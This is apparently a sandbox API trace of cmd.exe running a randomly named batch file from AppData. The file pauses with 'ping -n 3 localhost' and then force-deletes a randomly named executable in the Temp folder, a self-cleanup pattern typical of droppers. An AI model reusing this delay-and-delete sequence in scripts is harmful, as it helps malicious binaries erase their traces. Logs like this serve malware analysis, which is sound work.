[0109.496] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0109.496] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0109.497] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0109.497] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0109.497] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0109.497] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0109.497] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0109.497] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0109.497] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0109.497] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0109.497] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0109.497] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0109.497] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0109.497] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0109.497] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0109.497] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0109.497] _wcsicmp (_String1="ping", _String2="START") returned -3 [0109.497] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0109.497] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0109.497] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0109.497] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0109.497] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0109.497] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0109.497] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0109.497] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0109.497] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0109.497] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0109.497] SetErrorMode (uMode=0x0) returned 0x0 [0109.497] SetErrorMode (uMode=0x1) returned 0x0 [0109.497] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x340550, lpFilePart=0x28f260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f260*="Desktop") returned 0x18 [0109.497] SetErrorMode (uMode=0x0) returned 0x1 [0109.498] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.498] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.498] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.498] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.498] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0xffffffff [0109.498] GetLastError () returned 0x2 [0109.498] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0xffffffff [0109.498] GetLastError () returned 0x2 [0109.498] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0x340838 [0109.499] FindClose (in: hFindFile=0x340838 | out: hFindFile=0x340838) returned 1 [0109.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0xffffffff [0109.499] GetLastError () returned 0x2 [0109.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0x340838 [0109.499] FindClose (in: hFindFile=0x340838 | out: hFindFile=0x340838) returned 1 [0109.499] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.499] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.499] GetConsoleTitleW (in: lpConsoleTitle=0x28f02c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.499] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.499] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.499] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0xffffffff [0109.500] GetLastError () returned 0x2 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0xffffffff [0109.500] GetLastError () returned 0x2 [0109.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0x340d80 [0109.500] FindClose (in: hFindFile=0x340d80 | out: hFindFile=0x340d80) returned 1 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0xffffffff [0109.500] GetLastError () returned 0x2 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0x340d80 [0109.500] FindClose (in: hFindFile=0x340d80 | out: hFindFile=0x340d80) returned 1 [0109.500] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.500] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.500] GetConsoleTitleW (in: lpConsoleTitle=0x28edc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.501] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ec48, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ed10 | out: lpAttributeList=0x28ec48, lpSize=0x28ed10) returned 1 [0109.501] UpdateProcThreadAttribute (in: lpAttributeList=0x28ec48, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ed08, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ec48, lpPreviousValue=0x0) returned 1 [0109.501] GetStartupInfoW (in: lpStartupInfo=0x28ec04 | out: lpStartupInfo=0x28ec04*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0109.501] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0109.502] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28eca4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ecf0 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x28ecf0*(hProcess=0x54, hThread=0x58, dwProcessId=0xd10, dwThreadId=0xd14)) returned 1 [0109.505] CloseHandle (hObject=0x58) returned 1 [0109.505] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.505] GetEnvironmentStringsW () returned 0x330970* [0109.505] FreeEnvironmentStringsW (penv=0x330970) returned 1 [0109.505] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0112.401] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ebe4 | out: lpExitCode=0x28ebe4*=0x0) returned 1 [0112.401] CloseHandle (hObject=0x54) returned 1 [0112.401] _vsnwprintf (in: _Buffer=0x28ed2c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ebf0 | out: _Buffer="00000000") returned 8 [0112.401] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0112.401] GetEnvironmentStringsW () returned 0x332c28* [0112.401] FreeEnvironmentStringsW (penv=0x332c28) returned 1 [0112.401] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0112.401] GetEnvironmentStringsW () returned 0x332c28* [0112.401] FreeEnvironmentStringsW (penv=0x332c28) returned 1 [0112.401] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ec48 | out: lpAttributeList=0x28ec48) [0112.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.401] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.402] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.402] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.402] SetConsoleInputExeNameW () returned 0x1 [0112.402] GetConsoleOutputCP () returned 0x1b5 [0112.402] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.402] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.402] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.402] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0112.402] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.402] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0112.403] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.403] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0112.403] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x7c, lpOverlapped=0x0) returned 1 [0112.404] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0112.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n") returned 62 [0112.404] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.404] GetFileType (hFile=0x54) returned 0x1 [0112.404] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.404] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0112.405] _tell (_FileHandle=3) returned 83 [0112.405] _close (_FileHandle=3) returned 0 [0112.405] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f21c | out: _Buffer="\r\n") returned 2 [0112.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.405] GetFileType (hFile=0x7) returned 0x2 [0112.405] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1dc | out: lpMode=0x28f1dc) returned 1 [0112.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.405] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f208, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f208*=0x2) returned 1 [0112.405] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0112.405] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.406] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f218 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0112.406] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f218 | out: _Buffer=">") returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] GetFileType (hFile=0x7) returned 0x2 [0112.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1e0 | out: lpMode=0x28f1e0) returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f20c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f20c*=0x19) returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] GetFileType (hFile=0x7) returned 0x2 [0112.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f464 | out: lpMode=0x28f464) returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x33f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f490, lpReserved=0x0 | out: lpBuffer=0x33f008*, lpNumberOfCharsWritten=0x28f490*=0x3) returned 1 [0112.407] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f49c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" ") returned 58 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] GetFileType (hFile=0x7) returned 0x2 [0112.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f45c | out: lpMode=0x28f45c) returned 1 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x28f488, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f488*=0x3a) returned 1 [0112.407] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f4bc | out: _Buffer="\r\n") returned 2 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] GetFileType (hFile=0x7) returned 0x2 [0112.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f47c | out: lpMode=0x28f47c) returned 1 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f4a8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f4a8*=0x2) returned 1 [0112.408] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0112.408] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0112.408] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0112.408] GetConsoleTitleW (in: lpConsoleTitle=0x28f02c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.408] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x28e0a4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x28e0a8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x28e0a4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0112.408] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.408] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x2020 [0112.408] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x2020 [0112.409] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", fInfoLevelId=0x0, lpFindFileData=0x340554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x340554) returned 0x320aa8 [0112.409] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 1 [0112.409] FindNextFileW (in: hFindFile=0x320aa8, lpFindFileData=0x340554 | out: lpFindFileData=0x340554) returned 0 [0112.410] GetLastError () returned 0x12 [0112.410] FindClose (in: hFindFile=0x320aa8 | out: hFindFile=0x320aa8) returned 1 [0112.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.410] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.410] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.410] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.411] SetConsoleInputExeNameW () returned 0x1 [0112.411] GetConsoleOutputCP () returned 0x1b5 [0112.411] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.411] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.411] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.411] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0112.411] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.411] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0112.411] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.411] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0112.411] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x3e, lpOverlapped=0x0) returned 1 [0112.412] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n") returned 62 [0112.412] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.412] GetFileType (hFile=0x54) returned 0x1 [0112.412] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.412] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.413] _tell (_FileHandle=3) returned 145 [0112.413] _close (_FileHandle=3) returned 0 [0112.413] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f21c | out: _Buffer="\r\n") returned 2 [0112.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.413] GetFileType (hFile=0x7) returned 0x2 [0112.413] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.413] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1dc | out: lpMode=0x28f1dc) returned 1 [0112.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.413] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f208, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f208*=0x2) returned 1 [0112.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.414] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f218 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0112.414] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f218 | out: _Buffer=">") returned 1 [0112.414] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.414] GetFileType (hFile=0x7) returned 0x2 [0112.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.414] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1e0 | out: lpMode=0x28f1e0) returned 1 [0112.414] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.414] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f20c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f20c*=0x19) returned 1 [0112.414] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.414] GetFileType (hFile=0x7) returned 0x2 [0112.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.414] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f464 | out: lpMode=0x28f464) returned 1 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x33f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f490, lpReserved=0x0 | out: lpBuffer=0x33f008*, lpNumberOfCharsWritten=0x28f490*=0x3) returned 1 [0112.415] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f49c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" ") returned 58 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] GetFileType (hFile=0x7) returned 0x2 [0112.415] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.415] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f45c | out: lpMode=0x28f45c) returned 1 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x28f488, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f488*=0x3a) returned 1 [0112.415] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f4bc | out: _Buffer="\r\n") returned 2 [0112.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.415] GetFileType (hFile=0x7) returned 0x2 [0112.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.416] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f47c | out: lpMode=0x28f47c) returned 1 [0112.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.416] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f4a8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f4a8*=0x2) returned 1 [0112.416] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0112.416] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0112.416] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0112.416] GetConsoleTitleW (in: lpConsoleTitle=0x28f02c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.416] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, 